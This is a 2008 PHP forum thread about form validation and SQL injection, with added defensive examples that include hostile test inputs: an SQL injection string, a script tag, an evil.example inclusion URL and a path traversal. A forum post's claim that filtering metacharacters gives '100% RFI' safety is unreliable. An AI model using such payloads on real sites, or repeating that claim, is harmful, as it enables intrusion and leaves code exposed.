
PHP Form validation

Discussion in 'PHP' started by X.Homer.X, Jun 17, 2008.

  1. #1
    How would I go about validating my forms with is_numeric or regex, and protecting against SQL injection using mysql_real_escape_string() and htmlspecialchars()? There are 3 things I would like to validate/protect, each in a different form:

    one for one or two words, 0-30 characters
    one for a number, 1-3 digits
    one for a text block (paragraph)

    Could someone explain how I would validate/protect each type of form?
    Thanks =]
    X.Homer.X, Jun 17, 2008
  2. EricBruggema

    EricBruggema Well-Known Member

    #2
    is_numeric for a number.

    And what letters can a text block contain (all, or only letters and no symbols)?
    EricBruggema, Jun 18, 2008
  3. X.Homer.X

    X.Homer.X Peon

    #3
    Whatever would allow English to be spoken with no problems. Periods, quotes, commas, etc. No slashes though.
    X.Homer.X, Jun 18, 2008
  4. melol2

    melol2 Active Member

    #4
    Here is a basic one.
    On the receiving PHP end:

    <?php
    // Needs an open mysql_* connection first (mysql_connect), because
    // mysql_real_escape_string() escapes for that connection's charset;
    // the mysql_* extension itself was removed in PHP 7.
    if (isset($_POST['1']) && strlen($_POST['1']) < 31) {
        // 30 chars or less; the function returns the escaped copy, it does not change $_POST
        $field1 = mysql_real_escape_string(strip_tags($_POST['1']));
    }

    if (isset($_POST['2']) && is_numeric($_POST['2']) && strlen($_POST['2']) < 4) {
        // Numeric and 3 chars or less (is_numeric also accepts forms like "1.5", "-1" and "1e2")
        $field2 = $_POST['2'];
    }

    if (isset($_POST['3']) && strlen($_POST['3']) < 1000) {
        // Less than 1000 chars; tags removed, then escaped for the query
        $field3 = mysql_real_escape_string(strip_tags($_POST['3']));
    }
    ?>
    melol2, Jun 18, 2008
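As an added example (not code posted by anyone in this thread), here is how the three fields from the first post can be validated and stored on current PHP. The field names 'name', 'qty' and 'body', the table 'entries' and the sample submissions are made up; PDO prepared statements replace mysql_real_escape_string(), which no longer exists in PHP 7 and later, and htmlspecialchars() is applied only when a value is printed, not before it is stored:

```php
<?php
// Added example for this thread, not code posted by anyone in it. It validates
// the three fields the original poster described (one or two words of at most
// 30 characters, a 1-3 digit number, a free-text paragraph) and puts each
// protection where it belongs: validation on input, a prepared statement for
// the database, and htmlspecialchars() only when a value is printed into HTML.
// The field names 'name', 'qty', 'body' and the table 'entries' are made up.
// mysql_real_escape_string() was removed in PHP 7, so PDO is used instead.
// Requires the mbstring extension for mb_strlen().
declare(strict_types=1);

// Field 1: one or two words, 0-30 characters. Letters, digits, apostrophes and
// hyphens inside a word, a single space between two words; /u makes the
// pattern UTF-8 aware so accented names pass.
const NAME_RE = '/^(?:[\p{L}\p{N}\'-]+(?: [\p{L}\p{N}\'-]+)?)?$/u';
// Field 3: plain English text with ordinary punctuation; no slashes, no < or >.
const BODY_RE = '/^[\p{L}\p{N}\s.,;:!?\'"()&-]+$/u';

/** Pulls a scalar string out of $_POST-style input; arrays (name[]=x) become ''. */
function field(array $post, string $key): string
{
    return isset($post[$key]) && is_string($post[$key]) ? $post[$key] : '';
}

/** Returns ['ok' => bool, 'errors' => [field => message], 'values' => [field => clean value]]. */
function validate_form(array $post): array
{
    $errors = [];
    $values = [];

    $name = trim(field($post, 'name'));
    if (mb_strlen($name) > 30 || !preg_match(NAME_RE, $name)) {
        $errors['name'] = 'One or two words, at most 30 characters.';
    } else {
        $values['name'] = $name;
    }

    // ctype_digit() is stricter than is_numeric(), which also accepts
    // "1e2", "-5", " 12" and "1.5".
    $qty = field($post, 'qty');
    if (!ctype_digit($qty) || strlen($qty) > 3) {
        $errors['qty'] = 'A whole number of 1 to 3 digits.';
    } else {
        $values['qty'] = (int) $qty;
    }

    $body = trim(field($post, 'body'));
    if ($body === '' || mb_strlen($body) > 2000 || !preg_match(BODY_RE, $body)) {
        $errors['body'] = 'Plain text up to 2000 characters; slashes and tags are not allowed.';
    } else {
        $values['body'] = $body;
    }

    return ['ok' => $errors === [], 'errors' => $errors, 'values' => $values];
}

/**
 * Store validated values with a prepared statement. The driver sends the
 * values separately from the SQL text, so nothing needs escaping and the
 * row holds exactly what the user typed (no backslashes to strip later).
 */
function store_entry(PDO $db, array $values): int
{
    $stmt = $db->prepare('INSERT INTO entries (name, qty, body) VALUES (:name, :qty, :body)');
    $stmt->bindValue(':name', $values['name'], PDO::PARAM_STR);
    $stmt->bindValue(':qty', $values['qty'], PDO::PARAM_INT);
    $stmt->bindValue(':body', $values['body'], PDO::PARAM_STR);
    $stmt->execute();
    return (int) $db->lastInsertId();
}

/** Encode for HTML at output time only: "&" is stored as "&" and shown as "&amp;". */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed sample submissions standing in for $_POST.
$good = [
    'name' => "O'Brien Test",
    'qty'  => '042',
    'body' => "Tom & Jerry said \"hi\", didn't they?",
];
$hostile = [
    'name' => "x' OR 1=1 -- ",
    'qty'  => '1e2',
    'body' => '<script>alert(1)</script>',
];

$result = validate_form($good);
if ($result['ok']) {
    // With a real database:
    // store_entry(new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', $user, $pass), $result['values']);
    echo '<p>', h($result['values']['name']), ' (', $result['values']['qty'], ")</p>\n";
    echo '<p>', h($result['values']['body']), "</p>\n";
}
// All three hostile fields fail the allowlists before any SQL or HTML is built.
print_r(validate_form($hostile)['errors']);
```

The allowlist patterns decide what is accepted; the prepared statement makes the quote in O'Brien harmless without any escaping; h() handles the ampersand and quotes at the moment they reach the browser, which is the answer to "will & be stored correctly" (it is stored as typed).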
  5. X.Homer.X

    X.Homer.X Peon

    #5
    ... I don't use an array to handle POST. I don't understand what this script is doing (I'm a complete noob to mysql_real_escape_string, strip_tags, htmlspecialchars and all that protection stuff). This is my first time using this type of form on a web page. Can you explain the code?
    X.Homer.X, Jun 19, 2008
  6. melol2

    melol2 Active Member

    #6
    $_POST is a global array of all variables sent by a POST form.
    And mysql_real_escape_string adds backslashes to characters such as quotes and backslashes.
    And strip_tags removes most tags that can be used in HTML and PHP.
    melol2, Jun 19, 2008
  7. X.Homer.X

    X.Homer.X Peon

    #7
    Could I use htmlspecialchars() as well, so that & and stuff will be correctly stored?

    And could I get my $_POST like normal, like $_POST['name'] instead of $_POST['1']?

    Thanks.
    X.Homer.X, Jun 19, 2008
  8. melol2

    melol2 Active Member

    #8
    I don't think strip_tags strips &; it only strips HTML such as "<". But yes, you can use htmlspecialchars() instead of that.

    And yes. The example was only if your input was, say:
    <input name="1" value="pie">
    melol2, Jun 20, 2008
  9. X.Homer.X

    X.Homer.X Peon

    #9
    Okay, thanks, I'm pretty sure I understand how I would use this now. Thanks =] +rep'd
    X.Homer.X, Jun 20, 2008
  10. X.Homer.X

    X.Homer.X Peon

    #10
    Okay, this adds \ before all the escaped characters, but it also shows when it is echoed. Is there any way I can strip the slashes (will strip_slashes work?)
    X.Homer.X, Jun 20, 2008
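Added example for the backslash problem in the post above, not code from the thread. The slashes added by escaping are meant only for the SQL parser, so they show up either because the escaped copy was echoed instead of the original, or because the value was escaped twice (old PHP's magic_quotes_gpc plus the script's own call) and the backslashes really went into the row. addslashes()/stripslashes() stand in here for the escape and parse round trip so it runs without a database, and the sample value is constructed:

```php
<?php
// Added example for this thread, not code posted in it. It shows why the
// backslashes added by escaping show up when the value is echoed, and where
// stripslashes() belongs. addslashes() stands in for mysql_real_escape_string()
// so the snippet runs with no database; the real function also escapes NUL,
// \n, \r and \x1a and follows the connection charset, so use it (or, on PHP 7+,
// a prepared statement, which needs no escaping at all) for actual queries.
declare(strict_types=1);

/** Escape a value for use inside a single-quoted SQL string literal (stand-in). */
function escape_for_sql_literal(string $s): string
{
    return addslashes($s);
}

/** The text the database engine stores after parsing the escaped literal. */
function value_seen_by_database(string $escaped): string
{
    return stripslashes($escaped);
}

/**
 * PHP < 5.4 could add slashes to every $_POST value itself (magic_quotes_gpc).
 * Undo that exactly once, on input and before escaping; function_exists()
 * keeps this runnable on PHP 8, where get_magic_quotes_gpc() no longer exists.
 */
function undo_magic_quotes(string $s): string
{
    return function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc() ? stripslashes($s) : $s;
}

$raw = "Homer's \"admin\" panel";      // constructed form value

// Right: escape a copy for the query, store the original, echo the original.
$sql    = "INSERT INTO t (v) VALUES ('" . escape_for_sql_literal($raw) . "')";
$stored = value_seen_by_database(escape_for_sql_literal($raw));
echo "query:  $sql\n";
echo "stored: $stored\n";                 // identical to $raw, nothing to strip

// Mistake 1: echoing the escaped copy instead of the original. The slashes
// were only ever meant for the SQL parser, so never reuse that variable for HTML.
echo "echoed escaped copy: " . escape_for_sql_literal($raw) . "\n";

// Mistake 2: magic quotes already added slashes, then the script escaped
// again; the row now really contains backslashes, which is when people
// reach for stripslashes() on output instead of fixing the input side.
$from_post    = addslashes($raw);        // what $_POST held under magic quotes
$stored_twice = value_seen_by_database(escape_for_sql_literal($from_post));
echo "stored twice: $stored_twice\n";    // Homer\'s \"admin\" panel

// Fix for Mistake 2: run undo_magic_quotes() over each $_POST value once,
// then escape once for the query. Rows written earlier with doubled slashes
// need a one-off cleanup; stripslashes() on every echo only hides the symptom.
```

If the stored text already contains backslashes, the escaping was applied twice on the way in; if it does not, the echo is simply printing the wrong variable.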
  11. Skullborg

    Skullborg Guest

    #11
    FYI: Make sure your script filters metacharacters from user input so that your site will be 100% RFI (remote file inclusion) safe.
    Skullborg, Jun 20, 2008
  12. X.Homer.X

    X.Homer.X Peon

    #12
    Huh? Metacharacters? I'm new to this PHP sanitization thing; can you explain this thing you call metacharacters? :p
    X.Homer.X, Jun 20, 2008
  13. Skullborg

    Skullborg Guest

    #13
    Some metacharacters are:
    ^ $ \ / ( ) | ? + * [ ] { } < > , .

    They can be used to inject malicious code into a site.
    Skullborg, Jun 21, 2008
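An added example, not from the thread, of what remote file inclusion actually is in PHP and how it is prevented. The vulnerable pattern is a request value reaching include() or require(); the fix is an allowlist of page names, so the user-supplied string is only ever used as a lookup key and never becomes part of a path, which is a stronger guarantee than stripping metacharacters from it. Page names, file paths and the sample requests are made up:

```php
<?php
// Added example for this thread, not code posted in it. Remote file inclusion
// (RFI) happens when a request parameter reaches include()/require(), usually
// with allow_url_include enabled; the fix is an allowlist of known pages, not
// stripping metacharacters from the string. Page names and paths are made up.
declare(strict_types=1);

// Vulnerable shape (never include() the result of this): ?page=http://evil.example/x
// pulls attacker code when allow_url_include=On, and ?page=../../etc/passwd
// reads local files even when it is Off (local file inclusion).
function vulnerable_page_path(string $page): string
{
    return __DIR__ . '/pages/' . $page . '.php';
}

// Allowlist: the request value is only ever a key, never part of the path.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/** Returns the file to include, or null when the request is not a known page. */
function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;
    }
    return __DIR__ . '/pages/' . PAGES[$page];
}

/** Handler: include only what resolve_page() returned, never the raw parameter. */
function serve(string $page): void
{
    $file = resolve_page($page);
    if ($file === null) {
        http_response_code(404);
        echo "unknown page\n";
        return;
    }
    echo 'would include: ' . basename($file) . "\n";   // include $file; in a real app
}

// Constructed requests, as they would arrive in $_GET['page'].
foreach (['home', 'contact', 'http://evil.example/shell.txt', '../../etc/passwd', 'home/../about'] as $p) {
    echo str_pad($p, 32), ' -> ';
    serve($p);
}
// php.ini hardening, independent of the code: allow_url_include=Off (the
// default) and, unless URL streams are needed, allow_url_fopen=Off.
```

Only the two allowlisted names resolve to a file; the URL, the traversal string and the disguised traversal are all rejected without any character-level filtering.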
  14. X.Homer.X

    X.Homer.X Peon

    #14
    Would htmlspecialchars() strip that and return it as &amp; or whatever?

    Because I'm using mysql_real_escape_string(htmlspecialchars());

    Would this filter those? Also, it puts slashes before " and other escaped characters; would strip_slashes(); get rid of these?
    X.Homer.X, Jun 21, 2008
  15. Skullborg

    Skullborg Guest

    #15
    Yeah, it might. Give me a link to your site; I'll see whether it's RFI vulnerable. (I'll cause no harm, just a simple test.)
    Skullborg, Jun 23, 2008
  16. X.Homer.X

    X.Homer.X Peon

    #16
    Well, all my forms are in my admin panel (except login) and I don't exactly know how to sanitise that one, but I think phpBB3 may do that automatically (that's how the login script is handled). I will make a page that is accessible to anyone.

    EDIT: The site has been PM'd to you. (Don't want 'hackers' to see this and exploit possible loopholes I missed.)
    X.Homer.X, Jun 24, 2008